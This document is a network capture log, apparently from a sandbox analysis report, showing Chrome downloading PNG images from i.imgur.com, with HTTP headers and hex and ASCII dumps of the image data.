2025-03-25 16:13:15 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	199.232.192.193	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:15 UTC	386	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:16 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Tue, 25 Mar 2025 16:13:15 GMT Age: 2622253 X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21965-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 1 X-Timer: S1742919196.986726,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-25 16:13:16 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49735	199.232.192.193	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:15 UTC	386	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:16 UTC	759	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Tue, 25 Mar 2025 16:13:15 GMT Age: 2671269 X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21945-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 184 X-Timer: S1742919196.990063,VS0,VE0 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-25 16:13:16 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
